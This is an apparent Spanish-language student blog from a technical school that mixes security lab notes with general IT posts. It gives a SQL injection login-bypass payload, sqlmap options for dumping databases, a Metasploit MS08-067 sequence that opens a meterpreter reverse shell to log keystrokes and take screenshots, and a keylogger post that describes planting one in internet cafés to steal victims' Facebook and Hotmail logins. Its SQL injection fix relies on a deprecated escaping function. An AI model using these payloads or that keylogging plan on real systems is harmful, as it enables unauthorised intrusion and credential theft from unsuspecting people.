ITC

Escuela Tecnológica- Instituto Técnico Central De La Salle

martes, 4 de junio de 2013

SQL INJECTION

Que es?
Un SQL Injection se basa en un fallo en la comunicación entre el usuario final y la base de datos. Consiste en un ataque contra un Gestor de Base de Datos Relacionales que aprovecha la vulnerabilidad de una aplicación. La vulnerabilidad es permitir mandar instrucciones SQL adicionales a partir de un campo o un parametro de entradas "inyectadas". Al estar vulnerables se puede lograr la finalidad de un ataque.

Como hacerlo?
Para ingresar a una pagina web nos podemos identificar con un usuario 'admin' es el mas común  y en el password ponemos la siguiente sentencia: ‘ OR ”=’
Con esta consulta engañamos al sistema ya que forzamos una comparación de “nada” es igual a “nada” lo que nos da acceso al sistema.
Al igual que la anterior consulta se pueden intentar inyectar unas cuantas más forzando comparaciones simples (OR 1=1) o intentando comentar el código con “//” o “/* */”

Evitar un SQL Injection
Se deben controlar los datos de  entrada, no se deben confiar en las entradas de los usuarios, no utilizar secuencias SQL construidas dinamicamente, no utilizar cuentas con privilegios administrativos.
filtrar las consultas con mysql_real_escape_string()
$u=mysql_real_escape_string($_POST['usuario']);
$p=mysql_real_escape_string($_POST['password']);
SELECT * FROM users WHERE user='$u' AND password='$p'

mysql_real_escape_string() llama a la función de la biblioteca MySQL mysql_real_escape_string, la cual coloca barras invertidas antes de los siguientes caracteres: \x00, \n, \r, \, ‘, ” y \x1a

[Hacking Web] - Inyección SQL con Backtrack


Inyección SQL es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una base de datos.
El origen de la vulnerabilidad radica en el incorrecto chequeo y/o filtrado de las variables utilizadas en un programa que contiene, o bien genera, código SQL. 

El comienzo es ingresar a la base que tenemos en nuestro ordenador.


En seguida buscamos alguna pagina que tenga php?= id, lo cual la vuelve vulnerable a un ataque de inyección mysql

En seguida podemos verificar cual es el metodo por el cual podemos atacar la pagina. GET



php?id=  -> sintaxis necesaria para explotar vulnerabilidad en un enlace web

python ./sqlmap.py
 
-> da la orden de activar inyeccion sql

-u
 
-> permiso para colocar url vulnerable

--dbs -> comando que sirve para buscar base de datos 

--threads 5 -> comando que condiciona la agresividad de exploracion

--tables
 
-> comando para buscar tablas dentro de una base de datos

--columns
 
-> comando para buscar columnas dentro de una tabla de base de datos

-D
 
-> comando que autoriza colocar el nombre de una base de datos

-T
 
-> comando que autoriza colocar el nombre de una tabla dentro de la base de datos

-C
 
-> comando que autoriza colocar el nombre de una columna dentro de la tabla de una base de datos

--dump
 
-> comando que autoriza mostrar el contenido general

Ataque exploit a windows [Hacking-Etico]

Descargar ISO win xp: Aquí
Descargar ISO backtrack5 R3: Aquí
root@bt:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf > set rhost (victima)
msf > set lhost (atacante)
msf > set payload windows/meterpreter/reverse_tcp
msf > exploit

meterpreter > ps (aca tenemos que ubicar el numero de explorer.exe)
meterpreter > migrate (numero de explorer.exe)
meterpreter > keyscan_start
meterpreter > keyscan_dump

meterpreter > use espia
meterpreter > screenshot
Tomado de:http://www.backtrack.grupobloglatino.com/2012/12/backtrack-5-r3-ataque-exploit-windows.html

Noticia hackers del Mundo

UN NUEVO RECORD HACKER 


Un nuevo récord: hacker elimina más de 50 sites en media hora Un criminal cibernético desconocido, que se esconde bajo apodo F3PN, por la mañana del día 2 de mayo de este año batió un nuevo “record” por atacar sites. En un período que duró media hora, entre 8:30 y 9:00 atacó 53 sites en el dominio .co.za.


Estos Hacker la ley los ama jajaja


Adrian Lamo


Lamo fue quien logro penetrar los sistemas mas protegidos del mundo como Microsoft, y The New York Times. Entre sus listas de victimas tambien estuvo la pagina Yahoo,Bank Of America,Cingular. Lamo al penetrar el sistema de The New York Times fue detenido sin saber de sus demas crimenes fue liberado tras pagar 65,000 dlrs.

 



Kevin Poulsen


fue uno de los primeros en hackear la base de datos del fbi y la radio de los angeles KIIS-FM junto con sus lineas telefonicas , el es conocido como el maestro de las lineas telefonicas ya que esa es su especialidad 


 
Kevin Mitnick, el hacker más famoso del mundo

Un currículum muy buscado


La fulgurante carrera del Kevin Mitnick se inició en la década de los 80, periodo en el que fue arrestado en cuatro ocasiones y pasó su primera temporada en la cárcel. En 1992, y estando en libertad condicional, fue acusado nuevamente de hackear distintos servidores. La víspera del día de Navidad del citado año huyó de la justicia y permaneció en busca y captura hasta 1995, cuando fue detenido en Carolina del Norte. 

Mitnick fue entonces acusado de fraude informático y del robo de millones de dólares en software de importantes compañías tecnológicas. Como ejemplo, sobre él pesaron hasta ocho cargos de posesión ilegal de los ficheros electrónicos de empresas como Motorola Inc. y Sun Microsystems Inc. 

Tras su detención, Mitnick sentó cátedra. Sin quererlo se convirtió en el líder de gran parte de los hackers de todo el mundo y éstos, en el empeño de liberar a su mentor, iniciaron una campaña de ataques sistemáticos. 

Comenzaron a finales de 1997. El grupo colocó en el servidor de Yahoo un mensaje en el que advertían de la invasión irremediable de un virus que iba a causar verdaderos estragos en el planeta de los cibernautas. Consiguerion acceder al servidor, pero no causaron el menor daño. Simplemente dejaron un mensaje , en el que aseguraban que sólo entregarían la fórmula secreta si era liberado Kevin Mitnick. 

Siguieron a principios de 1998. Según informaba entonces News.Com, un grupo de piratas había conseguido adentrarse en el sistema informático de Naciones Unidas y verter por unas horas su particular mensaje: si Mitnick no era liberado, tendría lugar un "holocausto" informático. 

Sin embargo, la fama mundial la obtuvieron con el ataque del web del New York Times. Era domingo, 13 de septiembre. Los internautas que entonces entraron en el sitio del famoso rotativo se encontraron con una página en blanco en la que podían leerse las siglas HFG (Hacking for Girlies), acompañadas de fotografías de mujeres desnudas y un pequeño texto en el que explicaban el motivo del ataque. Además, incluían la lista de sus "conquistas" (entre las que se están las páginas de Motorola, Penthouse o la Nasa). 

 



Gary McKinnon y el Pentagono


Gary McKinnon, también llamado ‘Solo’, entro al mundo de la fama tras haber entrado a los computadores del pentágono en los Estados Unidos. Se estará enfrentando a una sentencia de pasar el resto de su vida en la cárcel por haber entrado en casi un centenar de computadores militares y de la NASA. Esto es muy grave, ya que todas sus intrusiones ocurrieron justo después de los atentados del 11S. 
Obviamente, McKinnon acepto su intrucion a dichos sistemas, alegando que no causo daño alguno y que se conecto desde la casa para realizar dichos ataques. Curioso como uno de los ‘hacks’ mas famosos se haya realizado desde un lugar tan fácilmente rastreable (ademas de obvio). 

Lo interesante de la historia, es que el motivo por los cuales McKinnon hizo y deshizo con las redes militares estadounidenses, fue alentado por la busqueda de duendecillos verdes del espacio exterior. El estaba convencido de que el gobierno norteamericano estaba ocultando informacion relacionada con OVNIs y vida extraterrestre, y al parecer encontro informacion que confirma dichas sospechas 





  


EL MUNDO

Detenido en Australia presunto hacker de LulzSec

La policía australiana detuvo a uno de los supuestos líderes del grupo de hackers LulzSec en Sydney, informaron las autoridades.
Al hombre, de 24 años y que trabajaba en el sector de las tecnologías de la información, se le acusa de entrar ilegalmente en una red informática. El detenido, que salió en libertad tras el pago de una fianza, es sospechoso de atacar en abril una web del gobierno australiano.
El grupo de hackers LulzSec está acusado de ataque a redes de grandes estudios de Hollywood, entre otros.El grupo de hackers LulzSec está acusado de ataque a redes de grandes estudios de Hollywood, entre otros.
Los piratas informáticos de LulzSec saltaron a la luz pública sobre todo en 2011, cuando comenzaron a atacar una serie de webs y servidores de bases de datos, entre otras la de los estudios de Hollywood Sony Pictures y 20th Century Fox o incluso de la CIA.
Después de algunos meses el grupo, cercano al movimiento Anonymus, anunció su disolución. El año pasado, cuatro supuestos miembros de LulzSec fueron detenidos en Estados Unidos y dos en Reino Unido.

lunes, 3 de junio de 2013

FIREFOX OS EN MOBILES

FIREFOX OS EN MOBILES


En este video pueden observar los avances de el equipo Mozilla Hispano en cuanto a tecnologías mobiles.




Linux VS Windows

LINUX VS WINDOWS




En cuanto a la instalación:


  • En Windows la instalación es minimamente configurable aunque es muy sencilla.
  • En Linux  la instalación no es sencilla pero permite personalizar totalmente los paquetes que se deseen instalar.

En cuanto a compatibilidad:
Ninguno de los dos Sistemas Operativos son el 100% compatibles con el Hardware, a pesar de que Windows se acerca más, los dos estan cerca de conseguirlo.


  • Windows al ser parte de Microsoft ofrece gran cantidad de drivers.
  •  Linux no esta en ninguna casa comercial, pero ofrece actualizaciones frecuentes.


En cuanto a software:

  •  Windows es el mas facil de usar y posee gran cantidad de software
  •  Linux ofrece menos software pero gracias a empresas como IBM ha logrado muchos avances


En cuanto a Robustez:

  • Linux se ha caracterizado siempre por la robustez de su sistema ya que pueden pasar meses e incluso años sin la necesidad de apagar o reiniciar el equipo, también si una aplicación falla simplemente no bloquea totalmente al equipo.
  • En Windows siempre hay que reiniciar cuando se cambia la configuración del sistema, se bloquea fácilmente cuando ejecuta operaciones aparentemente simples por lo que hay que reiniciar el equipo.

ESTAS SON LAS ESPECIFICACIONES BÁSICAS QUE SE RESALTAN EN ESTOS DOS SISTEMAS OPERATIVOS, LA DECISIÓN LA TOMAN USTEDES....





viernes, 24 de mayo de 2013

USO DE PROXY

Un proxy, en una red informática, es un programa o dispositivo que realiza una acción en representación de otro, esto es, si una hipotética máquina A solicita un recurso a una C, lo hará mediante una petición a B; C entonces no sabrá que la petición procedió originalmente de A.
Su finalidad más habitual es la de servidor proxy, que sirve para interceptar las conexiones de red que un cliente hace a un servidor de destino, por varios motivos posibles como seguridad, rendimiento, anonimato, etc.

Ventajas

La ventaja más importante al utilizar un servidor proxy en Internet, es el anonimato teórico que nos puede brindar el mismo, ya que a todos los efectos prácticos es otra PC que está navegando en lugar de nosotros. Con esto, no podrán saber nuestra dirección IP, tampoco que navegador usamos, ni ninguna información relacionada con nosotros.

Tambien en las ventajas estan:

*  Ahorro de Tráfico
*  Velocidad en Tiempo de respuesta
*  Demanda a Usuarios
*  Filtrado de contenido
*  Modificación de contenidos

Desventajas

Las páginas mostradas pueden no estar actualizadas si éstas han sido modificadas desde la última carga que realizó el proxy caché.

Un diseñador de páginas web puede indicar en el contenido de su web que los navegadores no  hagan una caché de sus páginas, pero este método no funciona habitualmente para un proxy.

El hecho de acceder a Internet a través de un Proxy, en vez de mediante conexión directa, impide realizar operaciones avanzadas a través de algunos puertos o protocolos.


Almacenar las páginas y objetos que los usuarios solicitan puede suponer una violación de la intimidad para algunas personas.

NEO TRACE

¿Qué es el Neo Trace?


Neo Trace es un trazador, que permite seguir la pista a los paquetes desde un ordenador a otro a través de Internet.

La utilidad que tiene el software NeoTrace es la misma que la utilidad en Windows llamada tracert, la diferencia radica en que NeoTrace estaba basado en gráficos y muestra una descripción más interactiva de las rutas trazadas por donde nuestro paquete va viajando a través de los routers en el planeta.



MERGE

EN ESTA PARTE PODEMOS OBSERVAR COMO SE PUEDE CREAR UN MERGE


Para crear un MERGE se debe crear un documento de Word y otro de Excel, se le deben asignar sus respectivos nombres y guardarlo como formato 2003.
Con la herramienta glue_MergeStream podemos combinar stream de tablas de Excel en stream de documentos de Word que fue lo que se hizo anteriormente. O también se puede hacer al contrario.




 A continuación podemos abrir el archivo de Word en el archivo de Excel.
De esta forma se hace un MERGE con Word y Excel, esto nos facilita mucho trabajo ya que podemos utilizar una carta de contenido general pero gracias a la combinación de datos el contenido va a ser único para cada caso.

jueves, 23 de mayo de 2013

KEYLOGGER

Un KEYLOGGER es un  tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas en un fichero o enviarlas a través de internet.

Para realizar la prueba utilizamos el keylogger revealer, después de aceptar el permiso de instalación, en seguida el malware advirtió de  un software altamente peligroso, sin embargo aceptando, se puede proceder a ingresar al software.

Este es el programa en sí, el botón se utiliza pausar o iniciar la grabación de pulsaciones por teclado, el muestra el usuario “FAMILIA”  la fecha y la hora. Podemos iniciar la grabación, generalmente estos programas se instalan en locales de internet para que nuestras victimas  ingresen a sus cuentas de “facebook” o “Hotmail” y así en otra ocasión, o a través de un correo enviar el bloc que queda guardado en la PC enviarlo a nuestro mail personal.


ENCRIPTACIÓN DE IMAGENES


La encriptación es el proceso para volver ilegible información considera importante. La información una vez encriptada sólo puede leerse aplicándole una clave.

Se trata de una medida de seguridad que es usada para almacenar o transferir información delicada que no debería ser accesible a terceros. Pueden ser contraseñas, números. de tarjetas de crédito, conversaciones privadas, etc.

El texto plano que está encriptado o cifrado se llama criptograma.

Sabiendo ya lo que significa encriptación, se puede seguir con el laboratorio y conocer la herramienta image hide , la cual tiene como función encriptar imágenes, esto quiere decir que después de ser instalada, se escoge una imagen la cual se desea encriptar, en este caso se eligió la imagen del ITC.
  
En la parte inferior del programa, justo debajo de la imagen, se escribe la información que se quiere encriptar, en esta imagen se escribió los correos de los participantes del paper.

Después de escribir la informacion, se elige la opción de encriptar, que aparece en la parte superior del programa y saldrá una imagen como la siguiente.
Después de esto se le la opción “ENCRYPT”, y el programa pide la contraseña obviamente para encriptar, se asigna una contraseña y él lo encripta.





domingo, 19 de mayo de 2013

Uso de Herramientas GETACCT NMAP y NS AUDITOR


NMAP

Por medio de este programa podemos verificar los puertos que están siendo utilizados por nuestro objetivo para así poder saber cuáles son los puntos débiles, y por cuales podremos acceder a su vulnerabilidad.



GetAcct


Para utilizar esta herramienta primero debemos conocer el nombre del objetivo al que vamos a atacar, en este caso el nombre que tiene es FAMILIA por consiguiente efectúa  correctamente la acción el programa, y podemos ver los usuarios conectados.


NSAuditor


Por medio de esta aplicación, podemos crear un el auditor, por medio de él  se encarga de crear una regla o un proceso el cual escanea todos los puertos dentro del rango que le establezcamos. En nuestro caso el rango escogido es 192.168.31.120 hasta 192.168.31.130. El escaneo arrojo como resultado 3  puestos, los cuales se encuentran abiertos.

·          135
·          139 (Chode, God Message worm, Msinit, Netlog, Network Qaz).
·          445
Con respecto al puerto 139 arrojo varios trojanos, los cuales están asociados a la falencia de seguridad en este puerto.


CAMBIO DE LA DIRECCIÓN MAC

CAMBIO DE LA DIRECCIÓN MAC

USO DE NBTSCAN

NBTSCAN


Lo primero que se hizo después de iniciar las dos maquinas virtuales (Windows 2000 y XP), fue conocer mediante el comando ipconfig la dirección ip y la máscara por defecto de los sistemas.

En seguida después de conocer las IPS, se inicio el programa BNTSCAN y se efectuó el escaneo según la información que conseguimos, esto se hizo desde la maquina virtual de XP.


En seguida el programa hizo escaneo las direcciones para conocer los nombres de NETBIOS. El programa solo nos obviamente información de estas dos.



En la anterior imagen se ve la información de Windows Server, dice que el dominio es Grupo Trabajo, etc.
En la anterior imagen se conoce el nombre de la NetBIOS y el host, también el nombre del dominio y más abajo la máscara.
Por otro lado mediante esta herramienta también podemos conocer los dump packets que nos sirven por ejemplo para conocer el adapter adrees, de las dos maquinas.


 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Affiliate Network Reviews